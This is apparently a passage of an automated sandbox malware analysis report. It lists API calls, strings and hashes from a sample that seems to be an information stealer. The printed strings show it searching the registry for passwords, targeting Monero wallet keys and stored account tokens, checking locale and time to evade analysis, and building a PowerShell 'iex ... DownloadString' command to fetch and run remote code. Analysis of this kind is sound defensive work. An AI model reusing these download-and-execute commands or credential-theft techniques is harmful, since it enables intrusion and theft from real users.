                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A44839
                                          • Part of subcall function 00A447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A44849
                                        • InternetOpenA.WININET(00A60DF7,00000001,00000000,00000000,00000000), ref: 00A4610F
                                        • StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A46147
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00A4618F
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00A461B3
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00A461DC
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A4620A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00A46249
                                        • InternetCloseHandle.WININET(?), ref: 00A46253
                                        • InternetCloseHandle.WININET(00000000), ref: 00A46260
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 83f5fe14671c6c14b445492fa908958ce51592bcc6956d8cb85f9977510d970d
                                        • Instruction ID: 17ad60f36c222320a9258a27653425d1650c262d23452a16ed5568abfe9e97e6
                                        • Opcode Fuzzy Hash: 83f5fe14671c6c14b445492fa908958ce51592bcc6956d8cb85f9977510d970d
                                        • Instruction Fuzzy Hash: 3A5165B5A00218ABEF20DF60DD45BEE7778FB44701F108199F605A71C1DBB46A89CF96
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A4733A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A473B1
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A4740D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00A47452
                                        • HeapFree.KERNEL32(00000000), ref: 00A47459
                                        • task.LIBCPMTD ref: 00A47555
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: 0469ea1d4f4c42f882cfb9060ebc9bbb8c32bda3eb06f9ee7248e9fb5364671d
                                        • Instruction ID: ac551f9b9d5323e3695ec2c937a33578b5a82858f675815521917e88728403dc
                                        • Opcode Fuzzy Hash: 0469ea1d4f4c42f882cfb9060ebc9bbb8c32bda3eb06f9ee7248e9fb5364671d
                                        • Instruction Fuzzy Hash: C5613CB99041689BDB24DB50DD41FEEB7B8BF84300F0081E9E649A6141DBB46FC9CFA1
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                        • lstrlen.KERNEL32(00000000), ref: 00A4BC9F
                                          • Part of subcall function 00A58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A58E52
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00A4BCCD
                                        • lstrlen.KERNEL32(00000000), ref: 00A4BDA5
                                        • lstrlen.KERNEL32(00000000), ref: 00A4BDB9
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 02ce3a61080077930854852ea7d215169cf384f5afcdbbc9de533c67e78e1e74
                                        • Instruction ID: b055cd97b90403e1b800d7cba27ac9366836823cc5f5452e52b6393febab1d3b
                                        • Opcode Fuzzy Hash: 02ce3a61080077930854852ea7d215169cf384f5afcdbbc9de533c67e78e1e74
                                        • Instruction Fuzzy Hash: 72B14471A10118ABDB04FBA0CE96EEE7738BF64301F444659F907A6191FF346A4DCB62
                                        APIs
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: 82410dabf260dfdea12f7d5e8785637217829be4361ab944960d56d49a9d9f30
                                        • Instruction ID: 4041b63a00694a7f54ebf98817c5bf63941667e84028e36c89c80f2f92c6c575
                                        • Opcode Fuzzy Hash: 82410dabf260dfdea12f7d5e8785637217829be4361ab944960d56d49a9d9f30
                                        • Instruction Fuzzy Hash: 97F0FE31944219EFE7449FE0E90976CBB70FB0D707F14019AE60987290D6784B51EB9A
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A44FCA
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A44FD1
                                        • InternetOpenA.WININET(00A60DDF,00000000,00000000,00000000,00000000), ref: 00A44FEA
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00A45011
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00A45041
                                        • InternetCloseHandle.WININET(?), ref: 00A450B9
                                        • InternetCloseHandle.WININET(?), ref: 00A450C6
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 28aaf9e483a61bc024c051cfaa58af4ebf2e35ef59f4f6e5843411f4a485982c
                                        • Instruction ID: 799388aec2d6eea07439f59d064e83e1bc437e1d571640f07d62c048533175ba
                                        • Opcode Fuzzy Hash: 28aaf9e483a61bc024c051cfaa58af4ebf2e35ef59f4f6e5843411f4a485982c
                                        • Instruction Fuzzy Hash: 223104B8A00218ABDB20CF54DC85BDDB7B4FB88704F5081D9EB09A7281D7706EC58F99
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A58426
                                        • wsprintfA.USER32 ref: 00A58459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A5847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A5848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A58499
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                        • RegQueryValueExA.ADVAPI32(00000000,0160E740,00000000,000F003F,?,00000400), ref: 00A584EC
                                        • lstrlen.KERNEL32(?), ref: 00A58501
                                        • RegQueryValueExA.ADVAPI32(00000000,0160E698,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00A60B34), ref: 00A58599
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A58608
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A5861A
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: f322c8bd5694fa5e2d2bc623feec48c9180ac5ac233eac195beded670b663652
                                        • Instruction ID: 11793f7b5e2273cc1f9f2d6cf74783676168f051736c811944dc3eb9b36e104c
                                        • Opcode Fuzzy Hash: f322c8bd5694fa5e2d2bc623feec48c9180ac5ac233eac195beded670b663652
                                        • Instruction Fuzzy Hash: 6321EB71A10218AFEB24DB54DC85FE9B7B8FB48701F00C5D9E609A6180DF75AA85CFE4
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A576A4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A576AB
                                        • RegOpenKeyExA.ADVAPI32(80000002,015FBFB0,00000000,00020119,00000000), ref: 00A576DD
                                        • RegQueryValueExA.ADVAPI32(00000000,0160E638,00000000,00000000,?,000000FF), ref: 00A576FE
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A57708
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 1e8b339d07bb9013e9dec511e6804488e027242990919c9ba3f0d3c7fbdff1a6
                                        • Instruction ID: 891cffede1fd7702aa4f3ce83a3ff366f6e551f0267e2e5dd325147775bdecb7
                                        • Opcode Fuzzy Hash: 1e8b339d07bb9013e9dec511e6804488e027242990919c9ba3f0d3c7fbdff1a6
                                        • Instruction Fuzzy Hash: 93014FB5A04204BBEB00DBE4ED49F6EB7B8EB48701F104455FE04E7291E67499048B65
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57734
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A5773B
                                        • RegOpenKeyExA.ADVAPI32(80000002,015FBFB0,00000000,00020119,00A576B9), ref: 00A5775B
                                        • RegQueryValueExA.ADVAPI32(00A576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00A5777A
                                        • RegCloseKey.ADVAPI32(00A576B9), ref: 00A57784
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: b308636ce5967737d0aa34067dad3b89620f99a68cd41dc44bd73e169db98fba
                                        • Instruction ID: 7bd57b52fc8fee1cac22e82c9c244bf5653ffb53e474efc3a8ee6e19ccc6cdbf
                                        • Opcode Fuzzy Hash: b308636ce5967737d0aa34067dad3b89620f99a68cd41dc44bd73e169db98fba
                                        • Instruction Fuzzy Hash: B30167B5A40308BBE700DBE0DC49FAEB7B8FB48701F004559FA05A7291D67465008B65
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A499EC
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A49A11
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00A49A31
                                        • ReadFile.KERNEL32(000000FF,?,00000000,00A4148F,00000000), ref: 00A49A5A
                                        • LocalFree.KERNEL32(00A4148F), ref: 00A49A90
                                        • CloseHandle.KERNEL32(000000FF), ref: 00A49A9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 1861bb783710bf201f000c8efbdab0b4173d55240725bb2eeb36a6b738ffc44a
                                        • Instruction ID: 2edee561117f96127a4e32f3562ee6016af0c66f4c23c2ddcbb60a3cc482fb31
                                        • Opcode Fuzzy Hash: 1861bb783710bf201f000c8efbdab0b4173d55240725bb2eeb36a6b738ffc44a
                                        • Instruction Fuzzy Hash: 86312D78A00209EFDB14CF94C985BEF77B5FF88341F108169E911A7290D778A952CFA1
                                        APIs
                                        • lstrcat.KERNEL32(?,0160E218), ref: 00A547DB
                                          • Part of subcall function 00A58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A58E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54801
                                        • lstrcat.KERNEL32(?,?), ref: 00A54820
                                        • lstrcat.KERNEL32(?,?), ref: 00A54834
                                        • lstrcat.KERNEL32(?,015FB7F8), ref: 00A54847
                                        • lstrcat.KERNEL32(?,?), ref: 00A5485B
                                        • lstrcat.KERNEL32(?,0160DBE0), ref: 00A5486F
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A58D90: GetFileAttributesA.KERNEL32(00000000,?,00A41B54,?,?,00A6564C,?,?,00A60E1F), ref: 00A58D9F
                                          • Part of subcall function 00A54570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A54580
                                          • Part of subcall function 00A54570: RtlAllocateHeap.NTDLL(00000000), ref: 00A54587
                                          • Part of subcall function 00A54570: wsprintfA.USER32 ref: 00A545A6
                                          • Part of subcall function 00A54570: FindFirstFileA.KERNEL32(?,?), ref: 00A545BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: b7e0c3eba68c874662756c1aef9b0971f19d979b579ffd474e1bf6c0027d12f1
                                        • Instruction ID: 39a001fc620323ae7a7b99e171833b9f678e9aafcdb2b2dde5ce25713ad1834c
                                        • Opcode Fuzzy Hash: b7e0c3eba68c874662756c1aef9b0971f19d979b579ffd474e1bf6c0027d12f1
                                        • Instruction Fuzzy Hash: 213180B2900208A7DB10FBB0DC85FED737CBB58701F404589B719A6081EE78978DCBA6
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00A52D85
                                        Strings
                                        • ')", xrefs: 00A52CB3
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00A52D04
                                        • <, xrefs: 00A52D39
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00A52CC4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: cfb1c826fba4ca0c7bad6e7d744e612a8092b7d5f4dd78cd5acac6bbe5711172
                                        • Instruction ID: d7dc141dfd1e063490e6f4fde2ceec749b486a1c4789e3ddc1fac06c84dfad10
                                        • Opcode Fuzzy Hash: cfb1c826fba4ca0c7bad6e7d744e612a8092b7d5f4dd78cd5acac6bbe5711172
                                        • Instruction Fuzzy Hash: 8D41BD71E102089ADB14EBA0C992FEDBB74BF24301F404619F916B7191EF746A8ECF91
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00A49F41
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$AllocLocal
                                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                        • API String ID: 4171519190-1096346117
                                        • Opcode ID: d007f56b46498e3a91e95704af996f04b514c4edca7f40fe6997f1bc54b7f5eb
                                        • Instruction ID: 8899c93c07b1327d21e3d40ff8dd8de84d0d16d84345cc3bff896a245c47aa58
                                        • Opcode Fuzzy Hash: d007f56b46498e3a91e95704af996f04b514c4edca7f40fe6997f1bc54b7f5eb
                                        • Instruction Fuzzy Hash: 52615174A10248EBDB14EFA4CD96FEE7775BFA4344F008518F90A9F181EB706A49CB52
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,0160DD40,00000000,00020119,?), ref: 00A540F4
                                        • RegQueryValueExA.ADVAPI32(?,0160E1E8,00000000,00000000,00000000,000000FF), ref: 00A54118
                                        • RegCloseKey.ADVAPI32(?), ref: 00A54122
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54147
                                        • lstrcat.KERNEL32(?,0160E230), ref: 00A5415B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 690832082-0
                                        • Opcode ID: 62a53b1c63ed2c92d3a2aade0cab95d91d0aa2ccb706c562d6f73e348eb61ea9
                                        • Instruction ID: 12dc605af181f37247e5e9a618da62488542bd959fc4374d92ad635adecf9833
                                        • Opcode Fuzzy Hash: 62a53b1c63ed2c92d3a2aade0cab95d91d0aa2ccb706c562d6f73e348eb61ea9
                                        • Instruction Fuzzy Hash: 674189B6D10108ABEB14EBA0DD4AFFE737DBB88300F404559BB1557181EA755B8C8BE2
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00A5696C
                                        • sscanf.NTDLL ref: 00A56999
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A569B2
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A569C0
                                        • ExitProcess.KERNEL32 ref: 00A569DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
